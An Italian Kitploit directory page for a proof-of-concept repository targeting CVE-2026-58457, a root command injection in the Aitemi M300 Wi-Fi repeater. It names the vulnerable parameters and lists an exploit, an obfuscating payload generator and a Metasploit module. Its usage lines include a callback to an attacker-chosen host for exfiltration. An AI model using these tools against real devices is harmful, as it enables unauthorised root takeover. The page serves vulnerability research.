Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-58457 — Strumenti PoC per CVE-2026-58457: Iniezione di comandi del sistema operativo non autenticata che porta a root remoto su Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Include exploit, validatore, generatore di payload e modulo Metasploit. Solo per test di penetrazione educativi e autorizzati. | Kitploit
Strumenti/GitHubGitHub/j4ck3lsyn-gen2/cve-2026-58457
Framework di ExploitSicurezza IoTGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WirelessPenetration TestingCommand and Control
Apprendimento e Formazione
GitHubj4ck3lsyn-gen2/cve-2026-58457

CVE-2026-58457

Vedi Repository
2172 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Strumenti PoC per CVE-2026-58457: Iniezione di comandi del sistema operativo non autenticata che porta a root remoto su Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Include exploit, validatore, generatore di payload e modulo Metasploit. Solo per test di penetrazione educativi e autorizzati.

Condividi

CVE-2026-58457 - Iniezione di comandi OS non autenticata nel ripetitore Wi-Fi Shenzhen Aitemi M300

[!WARNING] Questo codice è fornito COSÌ COM'È solo a scopo didattico e di ricerca. Non utilizzare questo PoC su sistemi di produzione, ambienti condivisi o target non autorizzati.

  • L'esecuzione o l'hosting di questo codice può attivare rilevamenti antivirus, avvisi di monitoraggio della sicurezza o conseguenze legali in caso di uso improprio.
  • Gli autori e i manutentori del repository declinano ogni responsabilità per danni, usi impropri o attività illegali derivanti da questo codice.
  • Da utilizzare esclusivamente in ambienti di laboratorio isolati con la dovuta autorizzazione. Destinato esclusivamente alla ricerca difensiva, all'analisi delle vulnerabilità e ai test blue-team.

Riepilogo della vulnerabilità

Esiste una vulnerabilità di iniezione di comandi del sistema operativo non autenticata nel gestore smacfilter_conf. I parametri GET name, enable e mac vengono passati senza sanificazione a una chiamata sprintf() che costruisce comandi UCI eseguiti come root.

  • Gravità: Critica (CVSS 9.8)
  • Impatto: Esecuzione remota di comandi come root senza autenticazione

Strumenti inclusi

  • poc.py - Exploit completo con supporto HTTPS, tentativi ripetuti, timeout ed esfiltrazione tramite callback.
  • val.py - Validatore di vulnerabilità sicuro e passivo (usa il comando innocuo id).
  • gen.py - Generatore di payload avanzato con molteplici tecniche di offuscamento.
  • MITIGATIONS.md - Misure difensive raccomandate.
  • Modulo Metasploit - Disponibile nella directory exploit/.

Installazione

pip install requests

Utilizzo rapido

  1. Valida (Sicuro)
python3 val.py --target 192.168.1.100
  1. Exploit (Solo test autorizzati)
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
  1. Genera payload offuscati
python3 gen.py -c "id" -n 10

Metasploit

  1. Sposta il modulo
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# or the main MSF path: /usr/share/metasploit-framework/modules/exploits/linux/http/
  1. Ricarica tutto
msfconsole -q -x "reload_all"

Riferimenti

  • CVE-2026-58457
  • Avviso VulnCheck
  • Divulgazione GitHub

Stelle e contributi sono benvenuti - in particolare miglioramenti per bypass o varianti firmware aggiuntive.

Scarica lo strumento